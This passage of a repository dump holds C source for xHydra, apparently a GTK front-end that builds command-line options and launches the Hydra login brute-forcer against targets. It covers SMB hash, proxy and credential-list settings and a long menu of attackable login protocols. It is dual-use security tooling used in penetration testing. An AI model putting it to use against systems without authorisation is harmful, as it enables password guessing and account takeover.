= lookup_widget(GTK_WIDGET(wndMain), \"chkLocal\");\n options[i++] = \"-m\";\n strncpy(smbparm, \"Both\", sizeof(smbparm));\n smbparm[strlen(\"Both\")] = '\\0';\n\n if (gtk_toggle_button_get_active((GtkToggleButton *)widget)) {\n strncpy(smbparm, \"Domain\", sizeof(smbparm));\n smbparm[strlen(\"Domain\")] = '\\0';\n }\n if (gtk_toggle_button_get_active((GtkToggleButton *)widget2)) {\n if (gtk_toggle_button_get_active((GtkToggleButton *)widget)) {\n strncpy(smbparm, \"Both\", sizeof(smbparm));\n smbparm[strlen(\"Both\")] = '\\0';\n } else {\n strncpy(smbparm, \"Local\", sizeof(smbparm));\n smbparm[strlen(\"Local\")] = '\\0';\n }\n }\n widget = lookup_widget(GTK_WIDGET(wndMain), \"chkNTLM\");\n if (gtk_toggle_button_get_active((GtkToggleButton *)widget)) {\n strcat(smbparm, \"Hash\");\n }\n options[i++] = smbparm;\n } else if (!strcmp(tmp, \"smb2\")) {\n memset(smbparm, 0, sizeof(smbparm));\n\n options[i++] = \"-m\";\n options[i++] = smbparm;\n\n widget = lookup_widget(GTK_WIDGET(wndMain), \"chkNTLM\");\n int pth = gtk_toggle_button_get_active((GtkToggleButton *)widget);\n\n widget = lookup_widget(GTK_WIDGET(wndMain), \"entSMB2Workgroup\");\n\n snprintf(smbparm, sizeof(smbparm) - 1, \"nthash:%s workgroup:{%s}\", pth ? \"true\" : \"false\", (char *)gtk_entry_get_text((GtkEntry *)widget));\n } else if (!strcmp(tmp, \"sapr3\")) {\n widget = lookup_widget(GTK_WIDGET(wndMain), \"spnSAPR3\");\n j = gtk_spin_button_get_value_as_int((GtkSpinButton *)widget);\n snprintf(sapr3id, sizeof(sapr3id), \"%d\", j);\n options[i++] = \"-m\";\n options[i++] = sapr3id;\n\n } else if (!strcmp(tmp, \"cvs\") || !strcmp(tmp, \"svn\")) {\n widget = lookup_widget(GTK_WIDGET(wndMain), \"entCVS\");\n options[i++] = \"-m\";\n options[i++] = (char *)gtk_entry_get_text((GtkEntry *)widget);\n\n } else if (!strcmp(tmp, \"snmp\")) {\n widget = lookup_widget(GTK_WIDGET(wndMain), \"entSNMP\");\n options[i++] = \"-m\";\n options[i++] = (char *)gtk_entry_get_text((GtkEntry *)widget);\n\n } else if (!strcmp(tmp, \"telnet\")) {\n widget = lookup_widget(GTK_WIDGET(wndMain), \"entTelnet\");\n if ((char *)gtk_entry_get_text((GtkEntry *)widget) != NULL) {\n options[i++] = \"-m\";\n options[i++] = (char *)gtk_entry_get_text((GtkEntry *)widget);\n }\n }\n\n /* clean up proxy settings */\n unsetenv(\"HYDRA_PROXY_HTTP\");\n unsetenv(\"HYDRA_PROXY_CONNECT\");\n unsetenv(\"HYDRA_PROXY_AUTH\");\n\n /* proxy support */\n widget = lookup_widget(GTK_WIDGET(wndMain), \"radioProxy\");\n\n if (!gtk_toggle_button_get_active((GtkToggleButton *)widget)) {\n widget2 = lookup_widget(GTK_WIDGET(wndMain), \"entHTTPProxy\");\n widget = lookup_widget(GTK_WIDGET(wndMain), \"radioProxy2\");\n\n /* which variable do we set? */\n if ((!strncmp(tmp, \"http-\", 5)) && (gtk_toggle_button_get_active((GtkToggleButton *)widget))) {\n setenv(\"HYDRA_PROXY_HTTP\", gtk_entry_get_text((GtkEntry *)widget2), 1);\n } else {\n setenv(\"HYDRA_PROXY_CONNECT\", (char *)gtk_entry_get_text((GtkEntry *)widget2), 1);\n }\n\n /* do we need to provide user and pass? */\n widget = lookup_widget(GTK_WIDGET(wndMain), \"chkProxyAuth\");\n if (gtk_toggle_button_get_active((GtkToggleButton *)widget)) {\n widget = lookup_widget(GTK_WIDGET(wndMain), \"entProxyUser\");\n widget2 = lookup_widget(GTK_WIDGET(wndMain), \"entProxyPass\");\n a = g_string_new((gchar *)gtk_entry_get_text((GtkEntry *)widget));\n a = g_string_append_c(a, ':');\n a = g_string_append(a, gtk_entry_get_text((GtkEntry *)widget2));\n setenv(\"HYDRA_PROXY_AUTH\", a->str, 1);\n (void)g_string_free(a, TRUE);\n }\n }\n\n /* get the target, or target list */\n widget = lookup_widget(GTK_WIDGET(wndMain), \"radioTarget1\");\n if (gtk_toggle_button_get_active((GtkToggleButton *)widget)) {\n widget = lookup_widget(GTK_WIDGET(wndMain), \"entTarget\");\n options[i++] = (char *)gtk_entry_get_text((GtkEntry *)widget);\n } else {\n options[i++] = \"-M\";\n widget = lookup_widget(GTK_WIDGET(wndMain), \"entTargetFile\");\n options[i++] = (char *)gtk_entry_get_text((GtkEntry *)widget);\n }\n\n /* get the service */\n widget = lookup_widget(GTK_WIDGET(wndMain), \"entProtocol\");\n options[i++] = (char *)gtk_entry_get_text((GtkEntry *)widget);\n\n options[i] = NULL;\n return i;\n}\n\ngboolean update_statusbar(gpointer user_data) {\n int i, j;\n char *options[128];\n guint context_id;\n GtkStatusbar *statusbar;\n extern guint message_id;\n GString *statustext = g_string_new(\"hydra \");\n\n i = hydra_get_options(options);\n\n for (j = 1; j < i; j++) {\n statustext = g_string_append(statustext, options[j]);\n statustext = g_string_append_c(statustext, ' ');\n }\n\n statusbar = (GtkStatusbar *)lookup_widget(GTK_WIDGET(wndMain), \"statusbar\");\n context_id = gtk_statusbar_get_context_id(statusbar, \"status\");\n\n /* an old message in stack? */\n if (message_id != 0) {\n gtk_statusbar_remove(statusbar, context_id, message_id);\n }\n\n message_id = gtk_statusbar_push(statusbar, context_id, (gchar *)statustext->str);\n\n (void)g_string_free(statustext, TRUE);\n\n return TRUE;\n}\n\nint read_into(int fd) {\n char in_buf[BUF_S];\n char *passline;\n char *start, *end;\n int result;\n GtkWidget *output;\n GtkTextBuffer *outputbuf;\n GtkTextIter outputiter;\n\n if ((result = read(fd, in_buf, BUF_S - 1)) < 0) {\n g_warning(\"%s::%i: read returned negative!\", __FILE__, __LINE__);\n return FALSE;\n } else if (result == 0) {\n return FALSE;\n } else {\n in_buf[result] = 0;\n }\n\n output = lookup_widget(GTK_WIDGET(wndMain), \"txtOutput\");\n outputbuf = gtk_text_view_get_buffer((GtkTextView *)output);\n\n gtk_text_buffer_get_iter_at_offset(outputbuf, &outputiter, -1);\n\n if ((passline = strstr(in_buf, \"password: \")) == NULL) {\n gtk_text_buffer_insert(outputbuf, &outputiter, in_buf, result);\n } else {\n start = in_buf;\n end = in_buf;\n while ((end = (strchr(end + 1, '\\n'))) < passline) {\n start = end;\n }\n\n if (start != in_buf) {\n gtk_text_buffer_insert(outputbuf, &outputiter, in_buf, (start - in_buf + 1));\n }\n gtk_text_buffer_insert_with_tags_by_name(outputbuf, &outputiter, start, (end - start + 1), \"bold\", NULL);\n\n if (end - in_buf - result > 0) {\n gtk_text_buffer_insert(outputbuf, &outputiter, end + 1, -1);\n }\n }\n\n if (strstr(in_buf, \" finished at \") != NULL) {\n gtk_text_buffer_insert_with_tags_by_name(outputbuf, &outputiter, \"\\n\\n\", -1, \"bold\", NULL);\n }\n\n if (result == BUF_S - 1) /* there might be more available, recurse baby! */\n return read_into(fd);\n else\n return TRUE;\n}\n\n/* wait for hydra output */\n\nstatic gboolean wait_hydra_output(gpointer data) {\n static int stdout_ok = TRUE, stderr_ok = TRUE;\n fd_set rset;\n struct timeval tv;\n int result, max;\n int *fd = data;\n int status;\n\n g_assert((stdout_ok == TRUE) || (stderr_ok == TRUE));\n\n tv.tv_sec = 0;\n tv.tv_usec = 0;\n\n FD_ZERO(&rset);\n max = -1;\n\n if (stdout_ok) {\n FD_SET(fd[0], &rset);\n max = fd[0];\n }\n if (stderr_ok) {\n FD_SET(fd[1], &rset);\n if (-1 == max)\n max = fd[1];\n else\n max = fd[0] > fd[1] ? fd[0] : fd[1];\n }\n\n result = select(max + 1, &rset, NULL, NULL, &tv);\n\n if (result < 0)\n g_error(\"wait_hydra_output: select returned negative!\");\n else if (result == 0)\n return TRUE;\n\n if (stdout_ok && FD_ISSET(fd[0], &rset))\n stdout_ok = read_into(fd[0]);\n if (stderr_ok && FD_ISSET(fd[1], &rset))\n stderr_ok = read_into(fd[1]);\n\n if (!(stdout_ok || stderr_ok)) {\n waitpid(hydra_pid, &status, 0);\n hydra_pid = 0;\n stdout_ok = stderr_ok = TRUE;\n return FALSE;\n } else\n return TRUE;\n}\n\n/* assumes a successfull pipe() won't set the fd's to -1 */\nstatic void close_pipe(int *pipe) {\n if (-1 != pipe[0]) {\n close(pipe[0]);\n pipe[0] = -1;\n }\n if (-1 != pipe[1]) {\n close(pipe[1]);\n pipe[1] = -1;\n }\n}\n\n/* executes the command stored in command->elemets (which is suitable for execv())\n * returns an int *pfd with file descriptors:\n * pfd[0] STDOUT output of the command and\n * pfd[1] STDERR output of the command\n */\n\nint *popen_re_unbuffered(char *command) {\n static int p_r[2] = {-1, -1}, p_e[2] = {-1, -1};\n static int *pfd = NULL;\n\n char *options[128];\n\n hydra_pid = 0;\n\n update_statusbar(NULL);\n\n /* only allocate once */\n if (NULL == pfd)\n pfd = malloc(sizeof(int) * 2);\n\n /* clean up from last command */\n close_pipe(p_r);\n close_pipe(p_e);\n\n if (pipe(p_r) < 0 || pipe(p_e) < 0) {\n g_warning(\"popen_rw_unbuffered: Error creating pipe!\");\n return NULL;\n }\n\n if ((hydra_pid = fork()) < 0) {\n g_warning(\"popen_rw_unbuffered: Error forking!\");\n return NULL;\n } else if (hydra_pid == 0) { /* child */\n int k;\n\n if (setpgid(getpid(), getpid()) < 0)\n g_warning(\"popen_rw_unbuffered: setpgid() failed\");\n if (close(p_r[0]) < 0)\n g_warning(\"popen_rw_unbuffered: close(p_r[0]) failed\");\n if (p_r[1] != STDOUT_FILENO)\n if (dup2(p_r[1], STDOUT_FILENO) < 0)\n g_warning(\"popen_rw_unbuffered: child dup2 STDOUT failed!\");\n if (close(p_r[1]) < 0)\n g_warning(\"popen_rw_unbuffered: close(p_r[1]) failed\");\n\n if (close(p_e[0]) < 0)\n g_warning(\"popen_rw_unbuffered: close(p_e[0]) failed\");\n if (p_e[1] != STDERR_FILENO)\n if (dup2(p_e[1], STDERR_FILENO) < 0)\n g_warning(\"popen_rw_unbuffered: child dup2 STDERR failed!\");\n if (close(p_e[1]) < 0)\n g_warning(\"popen_rw_unbuffered: close(p_e[1]) failed\");\n\n (void)hydra_get_options(options);\n\n execv(HYDRA_BIN, options);\n\n g_warning(\"%s %i: popen_rw_unbuffered: execv() returned\", __FILE__, __LINE__);\n\n for (k = 0; options[k] != NULL; k++) {\n g_warning(\"%s\", options[k]);\n }\n gtk_main_quit();\n } else { /* parent */\n if (close(p_r[1]) < 0)\n g_warning(\"popen_rw_unbuffered: close(p_r[1]) (parent) failed\");\n if (close(p_e[1]) < 0)\n g_warning(\"popen_rw_unbuffered: close(p_e[1]) (parent) failed\");\n pfd[0] = p_r[0];\n pfd[1] = p_e[0];\n return pfd;\n }\n g_assert_not_reached();\n return pfd;\n}\n\nvoid on_quit1_activate(GtkMenuItem *menuitem, gpointer user_data) { gtk_main_quit(); }\n\nvoid on_about1_activate(GtkMenuItem *menuitem, gpointer user_data) {}\n\nvoid on_btnStart_clicked(GtkButton *button, gpointer user_data) {\n int *fd = NULL;\n\n fd = popen_re_unbuffered(NULL);\n g_timeout_add(200, wait_hydra_output, fd);\n}\n\nvoid on_btnStop_clicked(GtkButton *button, gpointer user_data) {\n if (hydra_pid != 0) {\n kill(hydra_pid, SIGTERM);\n hydra_pid = 0;\n }\n}\n\nvoid on_wndMain_destroy(GtkWidget *object, gpointer user_data) {\n if (hydra_pid != 0) {\n kill(hydra_pid, SIGTERM);\n hydra_pid = 0;\n }\n gtk_main_quit();\n}\n\ngboolean on_entTargetFile_button_press_event(GtkWidget *widget, GdkEventButton *event, gpointer user_data) {\n hydra_select_file((GtkEntry *)widget, \"Select target list\");\n gtk_widget_grab_focus(widget);\n return TRUE;\n}\n\ngboolean on_entUsernameFile_button_press_event(GtkWidget *widget, GdkEventButton *event, gpointer user_data) {\n hydra_select_file((GtkEntry *)widget, \"Select username list\");\n gtk_widget_grab_focus(widget);\n return TRUE;\n}\n\ngboolean on_entPassFile_button_press_event(GtkWidget *widget, GdkEventButton *event, gpointer user_data) {\n hydra_select_file((GtkEntry *)widget, \"Select password list\");\n gtk_widget_grab_focus(widget);\n return TRUE;\n}\n\ngboolean on_entColonFile_button_press_event(GtkWidget *widget, GdkEventButton *event, gpointer user_data) {\n hydra_select_file((GtkEntry *)widget, \"Select colon separated user,password list\");\n gtk_widget_grab_focus(widget);\n return TRUE;\n}\n\nvoid on_btnSave_clicked(GtkButton *button, gpointer user_data) {\n#ifdef GTK_TYPE_FILE_CHOOSER\n GtkWidget *dialog;\n char *filename;\n gchar *text;\n int fd;\n GtkWidget *output;\n GtkTextBuffer *outputbuf;\n GtkTextIter start;\n GtkTextIter end;\n\n dialog = gtk_file_chooser_dialog_new(\"Save output\", (GtkWindow *)wndMain, GTK_FILE_CHOOSER_ACTION_SAVE, GTK_STOCK_SAVE, GTK_RESPONSE_ACCEPT, GTK_STOCK_CANCEL, GTK_RESPONSE_CANCEL, NULL);\n if (gtk_dialog_run(GTK_DIALOG(dialog)) == GTK_RESPONSE_ACCEPT) {\n filename = gtk_file_chooser_get_filename(GTK_FILE_CHOOSER(dialog));\n\n output = lookup_widget(GTK_WIDGET(wndMain), \"txtOutput\");\n outputbuf = gtk_text_view_get_buffer((GtkTextView *)output);\n gtk_text_buffer_get_start_iter(outputbuf, &start);\n gtk_text_buffer_get_end_iter(outputbuf, &end);\n\n text = gtk_text_buffer_get_text(outputbuf, &start, &end, TRUE);\n\n fd = open(filename, O_CREAT | O_TRUNC | O_WRONLY, 0644);\n if (fd >= 0) {\n write(fd, text, strlen(text));\n close(fd);\n }\n g_free(text);\n g_free(filename);\n }\n gtk_widget_destroy(dialog);\n#endif\n}\n\nvoid on_chkColon_toggled(GtkToggleButton *togglebutton, gpointer user_data) {\n GtkWidget *user, *pass;\n\n user = lookup_widget(GTK_WIDGET(wndMain), \"frmUsername\");\n ;\n pass = lookup_widget(GTK_WIDGET(wndMain), \"frmPass\");\n\n if (gtk_toggle_button_get_active(togglebutton)) {\n gtk_widget_set_sensitive(user, FALSE);\n gtk_widget_set_sensitive(pass, FALSE);\n } else {\n gtk_widget_set_sensitive(user, TRUE);\n gtk_widget_set_sensitive(pass, TRUE);\n }\n}\n\nvoid on_chkDisUser_toggled(GtkToggleButton *togglebutton, gpointer user_data) {\n GtkWidget *radioUsername1, *radioUsername2, *entUsername, *entUsernameFile;\n\n radioUsername1 = lookup_widget(GTK_WIDGET(wndMain), \"radioUsername1\");\n ;\n radioUsername2 = lookup_widget(GTK_WIDGET(wndMain), \"radioUsername2\");\n entUsername = lookup_widget(GTK_WIDGET(wndMain), \"entUsername\");\n entUsernameFile = lookup_widget(GTK_WIDGET(wndMain), \"entUsernameFile\");\n\n if (gtk_toggle_button_get_active(togglebutton)) {\n gtk_widget_set_sensitive(radioUsername1, FALSE);\n gtk_widget_set_sensitive(radioUsername2, FALSE);\n gtk_widget_set_sensitive(entUsername, FALSE);\n gtk_widget_set_sensitive(entUsernameFile, FALSE);\n } else {\n gtk_widget_set_sensitive(radioUsername1, TRUE);\n gtk_widget_set_sensitive(radioUsername2, TRUE);\n gtk_widget_set_sensitive(entUsername, TRUE);\n gtk_widget_set_sensitive(entUsernameFile, TRUE);\n }\n}\n\nvoid on_btnClear_clicked(GtkButton *button, gpointer user_data) {\n GtkWidget *output;\n GtkTextBuffer *outputbuf;\n\n output = lookup_widget(GTK_WIDGET(wndMain), \"txtOutput\");\n outputbuf = gtk_text_view_get_buffer((GtkTextView *)output);\n gtk_text_buffer_set_text(outputbuf, \"\", -1);\n}\n" }, { "path": "hydra-gtk/src/callbacks.h", "content": "#include \n\ngboolean update_statusbar(gpointer user_data);\n\nvoid on_quit1_activate(GtkMenuItem *menuitem, gpointer user_data);\n\nvoid on_about1_activate(GtkMenuItem *menuitem, gpointer user_data);\n\nvoid on_btnStart_clicked(GtkButton *button, gpointer user_data);\n\nvoid on_wndMain_destroy(GtkWidget *object, gpointer user_data);\n\nvoid on_btnStop_clicked(GtkButton *button, gpointer user_data);\n\ngboolean on_entTargetFile_button_press_event(GtkWidget *widget, GdkEventButton *event, gpointer user_data);\n\ngboolean on_entUsernameFile_button_press_event(GtkWidget *widget, GdkEventButton *event, gpointer user_data);\n\ngboolean on_entPassFile_button_press_event(GtkWidget *widget, GdkEventButton *event, gpointer user_data);\n\nvoid on_btnSave_clicked(GtkButton *button, gpointer user_data);\n\ngboolean on_entColonFile_button_press_event(GtkWidget *widget, GdkEventButton *event, gpointer user_data);\n\nvoid on_chkColon_toggled(GtkToggleButton *togglebutton, gpointer user_data);\n\nvoid on_btnClear_clicked(GtkButton *button, gpointer user_data);\n\nvoid on_chkDisUser_toggled(GtkToggleButton *togglebutton, gpointer user_data);\n" }, { "path": "hydra-gtk/src/interface.c", "content": "\n/*\n * DO NOT EDIT THIS FILE - it is generated by Glade.\n */\n\n#ifdef HAVE_CONFIG_H\n#include \n#endif\n\n#include \n#include \n#ifdef HAVE_UNISTD_H\n#include \n#endif\n#include \n#include \n\n#include \n\n#include \"callbacks.h\"\n#include \"interface.h\"\n#include \"support.h\"\n\n#define GLADE_HOOKUP_OBJECT(component, widget, name) g_object_set_data_full(G_OBJECT(component), name, g_object_ref(G_OBJECT(widget)), (GDestroyNotify) g_object_unref)\n\n#define GLADE_HOOKUP_OBJECT_NO_REF(component, widget, name) g_object_set_data(G_OBJECT(component), name, widget)\n\nGtkWidget *create_wndMain(void) {\n GtkWidget *wndMain;\n GtkWidget *vbox1;\n GtkWidget *menubar1;\n GtkWidget *quit1;\n GtkWidget *ntbMain;\n GtkWidget *vbox5;\n GtkWidget *frame11;\n GtkWidget *table8;\n GtkWidget *cmbProtocol;\n GtkWidget *entProtocol;\n GtkWidget *label7;\n GtkAdjustment *spnPort_adj;\n GtkWidget *spnPort;\n GtkWidget *label6;\n GtkWidget *radioTarget2;\n GSList *radioTarget2_group = NULL;\n GtkWidget *entTargetFile;\n GtkWidget *entTarget;\n GtkWidget *radioTarget1;\n GtkWidget *label28;\n GtkWidget *frame12;\n GtkWidget *table9;\n GtkWidget *chkVerbose;\n GtkWidget *chkDebug;\n GtkWidget *chkAttempts;\n GtkWidget *chkIPV6;\n GtkWidget *chkSSL;\n GtkWidget *chkServiceDetails;\n GtkWidget *chkCompleteHelp;\n GtkWidget *chkOldSSL;\n GtkWidget *label29;\n GtkWidget *label1;\n GtkWidget *vbox2;\n GtkWidget *frmUsername;\n GtkWidget *table2;\n GtkWidget *entUsernameFile;\n GtkWidget *entUsername;\n GtkWidget *chkUsernameLoop;\n GtkWidget *chkDisUser;\n GtkWidget *radioUsername1;\n GSList *radioUsername1_group = NULL;\n GtkWidget *radioUsername2;\n GtkWidget *label8;\n GtkWidget *frmPass;\n GtkWidget *table3;\n GtkWidget *entPassFile;\n GtkWidget *entPass;\n GtkWidget *radioPass1;\n GSList *radioPass1_group = NULL;\n GtkWidget *radioPass2;\n GtkWidget *radioGenerate;\n GtkWidget *entGeneration;\n GtkWidget *labelpass;\n GtkWidget *frame8;\n GtkWidget *table5;\n GtkWidget *chkColon;\n GtkWidget *entColonFile;\n GtkWidget *label20;\n GtkWidget *table6;\n GtkWidget *chkPassLogin;\n GtkWidget *chkPassNull;\n GtkWidget *chkPassReverse;\n GtkWidget *label2;\n GtkWidget *table4;\n GtkWidget *frame9;\n GtkWidget *table7;\n GtkWidget *label22;\n GtkWidget *entHTTPProxy;\n GtkWidget *chkProxyAuth;\n GtkWidget *label23;\n GtkWidget *entProxyUser;\n GtkWidget *label24;\n GtkWidget *entProxyPass;\n GtkWidget *label26;\n GtkWidget *hbox3;\n GtkWidget *radioProxy;\n GSList *radioProxy_group = NULL;\n GtkWidget *radioProxy2;\n GtkWidget *radioProxy3;\n GtkWidget *label21;\n GtkWidget *frame13;\n GtkWidget *table10;\n GtkWidget *chkExitf;\n GtkAdjustment *spnTimeout_adj;\n GtkWidget *spnTimeout;\n GtkAdjustment *spnTasks_adj;\n GtkWidget *spnTasks;\n GtkWidget *label32;\n GtkWidget *label31;\n GtkWidget *chkExitF;\n GtkWidget *chkNoErr;\n GtkWidget *label30;\n GtkWidget *label3;\n GtkWidget *vbox4;\n GtkWidget *frame10;\n GtkWidget *entHTTPProxyURL;\n GtkWidget *label27;\n GtkWidget *frame3;\n GtkWidget *entHTTPURL;\n GtkWidget *label15;\n GtkWidget *frame4;\n GtkWidget *entCiscoPass;\n GtkWidget *label16;\n GtkWidget *frame5;\n GtkWidget *entLDAPDN;\n GtkWidget *label17;\n GtkWidget *frame6;\n GtkWidget *hbox2;\n GtkWidget *chkLocal;\n GtkWidget *chkDomain;\n GtkWidget *chkNTLM;\n GtkWidget *label18;\n GtkWidget *frame7;\n GtkAdjustment *spnSAPR3_adj;\n GtkWidget *spnSAPR3;\n GtkWidget *label19;\n GtkWidget *frame15;\n GtkWidget *entCVS;\n GtkWidget *label34;\n GtkWidget *frame17;\n GtkWidget *alignment1;\n GtkWidget *entTelnet;\n GtkWidget *label36;\n GtkWidget *frame16;\n GtkWidget *entSNMP;\n GtkWidget *label35;\n GtkWidget *label14;\n GtkWidget *vbox3;\n GtkWidget *scrolledwindow1;\n GtkWidget *viewport1;\n GtkWidget *frame14;\n GtkWidget *txtOutput;\n GtkWidget *label33;\n GtkWidget *hbox1;\n GtkWidget *btnStart;\n GtkWidget *btnStop;\n GtkWidget *btnSave;\n GtkWidget *btnClear;\n GtkWidget *label4;\n GtkWidget *statusbar;\n GtkWidget *lblSMB2;\n GtkWidget *entSMB2Workgroup;\n GtkWidget *fraSMB2;\n GtkAccelGroup *accel_group;\n\n accel_group = gtk_accel_group_new();\n\n wndMain = gtk_window_new(GTK_WINDOW_TOPLEVEL);\n gtk_widget_set_name(wndMain, \"wndMain\");\n gtk_window_set_title(GTK_WINDOW(wndMain), \"xHydra\");\n\n vbox1 = gtk_box_new(GTK_ORIENTATION_VERTICAL, 0);\n gtk_widget_set_name(vbox1, \"vbox1\");\n gtk_widget_show(vbox1);\n gtk_container_add(GTK_CONTAINER(wndMain), vbox1);\n\n menubar1 = gtk_menu_bar_new();\n gtk_widget_set_name(menubar1, \"menubar1\");\n gtk_widget_show(menubar1);\n gtk_box_pack_start(GTK_BOX(vbox1), menubar1, FALSE, FALSE, 0);\n\n quit1 = gtk_image_menu_item_new_from_stock(\"gtk-quit\", accel_group);\n gtk_widget_set_name(quit1, \"quit1\");\n gtk_widget_show(quit1);\n gtk_container_add(GTK_CONTAINER(menubar1), quit1);\n\n ntbMain = gtk_notebook_new();\n gtk_widget_set_name(ntbMain, \"ntbMain\");\n gtk_widget_show(ntbMain);\n gtk_box_pack_start(GTK_BOX(vbox1), ntbMain, TRUE, TRUE, 0);\n\n vbox5 = gtk_box_new(GTK_ORIENTATION_VERTICAL, 0);\n gtk_widget_set_name(vbox5, \"vbox5\");\n gtk_widget_show(vbox5);\n gtk_container_add(GTK_CONTAINER(ntbMain), vbox5);\n\n frame11 = gtk_frame_new(NULL);\n gtk_widget_set_name(frame11, \"frame11\");\n gtk_widget_show(frame11);\n gtk_box_pack_start(GTK_BOX(vbox5), frame11, TRUE, TRUE, 0);\n\n table8 = gtk_table_new(5, 2, FALSE);\n gtk_widget_set_name(table8, \"table8\");\n gtk_widget_show(table8);\n gtk_container_add(GTK_CONTAINER(frame11), table8);\n\n cmbProtocol = gtk_combo_box_text_new_with_entry();\n gtk_widget_set_name(cmbProtocol, \"cmbProtocol\");\n gtk_widget_show(cmbProtocol);\n gtk_table_attach(GTK_TABLE(table8), cmbProtocol, 1, 2, 4, 5, (GtkAttachOptions)(GTK_EXPAND | GTK_SHRINK), (GtkAttachOptions)(GTK_EXPAND), 0, 0);\n gtk_combo_box_text_append_text(GTK_COMBO_BOX_TEXT(cmbProtocol), \"adam6500\");\n gtk_combo_box_text_append_text(GTK_COMBO_BOX_TEXT(cmbProtocol), \"afp\");\n gtk_combo_box_text_append_text(GTK_COMBO_BOX_TEXT(cmbProtocol), \"asterisk\");\n gtk_combo_box_text_append_text(GTK_COMBO_BOX_TEXT(cmbProtocol), \"cisco\");\n gtk_combo_box_text_append_text(GTK_COMBO_BOX_TEXT(cmbProtocol), \"cisco-enable\");\n gtk_combo_box_text_append_text(GTK_COMBO_BOX_TEXT(cmbProtocol), \"cvs\");\n gtk_combo_box_text_append_text(GTK_COMBO_BOX_TEXT(cmbProtocol), \"firebird\");\n gtk_combo_box_text_append_text(GTK_COMBO_BOX_TEXT(cmbProtocol), \"ftp\");\n gtk_combo_box_text_append_text(GTK_COMBO_BOX_TEXT(cmbProtocol), \"ftps\");\n gtk_combo_box_text_append_text(GTK_COMBO_BOX_TEXT(cmbProtocol), \"http-head\");\n gtk_combo_box_text_append_text(GTK_COMBO_BOX_TEXT(cmbProtocol), \"http-get\");\n gtk_combo_box_text_append_text(GTK_COMBO_BOX_TEXT(cmbProtocol), \"http-get-form\");\n gtk_combo_box_text_append_text(GTK_COMBO_BOX_TEXT(cmbProtocol), \"http-post-form\");\n gtk_combo_box_text_append_text(GTK_COMBO_BOX_TEXT(cmbProtocol), \"http-proxy\");\n gtk_combo_box_text_append_text(GTK_COMBO_BOX_TEXT(cmbProtocol), \"http-proxy-urlenum\");\n gtk_combo_box_text_append_text(GTK_COMBO_BOX_TEXT(cmbProtocol), \"https-head\");\n gtk_combo_box_text_append_text(GTK_COMBO_BOX_TEXT(cmbProtocol), \"https-get\");\n gtk_combo_box_text_append_text(GTK_COMBO_BOX_TEXT(cmbProtocol), \"https-get-form\");\n gtk_combo_box_text_append_text(GTK_COMBO_BOX_TEXT(cmbProtocol), \"https-post-form\");\n gtk_combo_box_text_append_text(GTK_COMBO_BOX_TEXT(cmbProtocol), \"icq\");\n gtk_combo_box_text_append_text(GTK_COMBO_BOX_TEXT(cmbProtocol), \"irc\");\n gtk_combo_box_text_append_text(GTK_COMBO_BOX_TEXT(cmbProtocol), \"imap\");\n gtk_combo_box_text_append_text(GTK_COMBO_BOX_TEXT(cmbProtocol), \"ldap2\");\n gtk_combo_box_text_append_text(GTK_COMBO_BOX_TEXT(cmbProtocol), \"ldap3\");\n gtk_combo_box_text_append_text(GTK_COMBO_BOX_TEXT(cmbProtocol), \"ldap3-crammd5\");\n gtk_combo_box_text_append_text(GTK_COMBO_BOX_TEXT(cmbProtocol), \"ldap3-digestmd5\");\n gtk_combo_box_text_append_text(GTK_COMBO_BOX_TEXT(cmbProtocol), \"memcached\");\n gtk_combo_box_text_append_text(GTK_COMBO_BOX_TEXT(cmbProtocol), \"mongodb\");\n gtk_combo_box_text_append_text(GTK_COMBO_BOX_TEXT(cmbProtocol), \"mssql\");\n gtk_combo_box_text_append_text(GTK_COMBO_BOX_TEXT(cmbProtocol), \"mysql\");\n gtk_combo_box_text_append_text(GTK_COMBO_BOX_TEXT(cmbProtocol), \"ncp\");\n gtk_combo_box_text_append_text(GTK_COMBO_BOX_TEXT(cmbProtocol), \"nntp\");\n gtk_combo_box_text_append_text(GTK_COMBO_BOX_TEXT(cmbProtocol), \"oracle\");\n gtk_combo_box_text_append_text(GTK_COMBO_BOX_TEXT(cmbProtocol), \"oracle-listener\");\n gtk_combo_box_text_append_text(GTK_COMBO_BOX_TEXT(cmbProtocol), \"oracle-sid\");\n gtk_combo_box_text_append_text(GTK_COMBO_BOX_TEXT(cmbProtocol), \"pcnfs\");\n gtk_combo_box_text_append_text(GTK_COMBO_BOX_TEXT(cmbProtocol), \"pop3\");\n gtk_combo_box_text_append_text(GTK_COMBO_BOX_TEXT(cmbProtocol), \"pcanywhere\");\n gtk_combo_box_text_append_text(GTK_COMBO_BOX_TEXT(cmbProtocol), \"postgres\");\n gtk_combo_box_text_append_text(GTK_COMBO_BOX_TEXT(cmbProtocol), \"radmin2\");\n gtk_combo_box_text_append_text(GTK_COMBO_BOX_TEXT(cmbProtocol), \"rdp\");\n gtk_combo_box_text_append_text(GTK_COMBO_BOX_TEXT(cmbProtocol), \"redis\");\n gtk_combo_box_text_append_text(GTK_COMBO_BOX_TEXT(cmbProtocol), \"rexec\");\n gtk_combo_box_text_append_text(GTK_COMBO_BOX_TEXT(cmbProtocol), \"rlogin\");\n gtk_combo_box_text_append_text(GTK_COMBO_BOX_TEXT(cmbProtocol), \"rpcap\");\n gtk_combo_box_text_append_text(GTK_COMBO_BOX_TEXT(cmbProtocol), \"rsh\");\n gtk_combo_box_text_append_text(GTK_COMBO_BOX_TEXT(cmbProtocol), \"rtsp\");\n gtk_combo_box_text_append_text(GTK_COMBO_BOX_TEXT(cmbProtocol), \"s7-300\");\n gtk_combo_box_text_append_text(GTK_COMBO_BOX_TEXT(cmbProtocol), \"sapr3\");\n gtk_combo_box_text_append_text(GTK_COMBO_BOX_TEXT(cmbProtocol), \"sip\");\n gtk_combo_box_text_append_text(GTK_COMBO_BOX_TEXT(cmbProtocol), \"smb\");\n gtk_combo_box_text_append_text(GTK_COMBO_BOX_TEXT(cmbProtocol), \"smb2\");\n gtk_combo_box_text_append_text(GTK_COMBO_BOX_TEXT(cmbProtocol), \"smtp\");\n gtk_combo_box_text_append_text(GTK_COMBO_BOX_TEXT(cmbProtocol), \"snmp\");\n gtk_combo_box_text_append_text(GTK_COMBO_BOX_TEXT(cmbProtocol), \"socks5\");\n gtk_combo_box_text_append_text(GTK_COMBO_BOX_TEXT(cmbProtocol), \"ssh\");\n gtk_combo_box_text_append_text(GTK_COMBO_BOX_TEXT(cmbProtocol), \"sshkey\");\n gtk_combo_box_text_append_text(GTK_COMBO_BOX_TEXT(cmbProtocol), \"svn\");\n gtk_combo_box_text_append_text(GTK_COMBO_BOX_TEXT(cmbProtocol), \"teamspeak\");\n 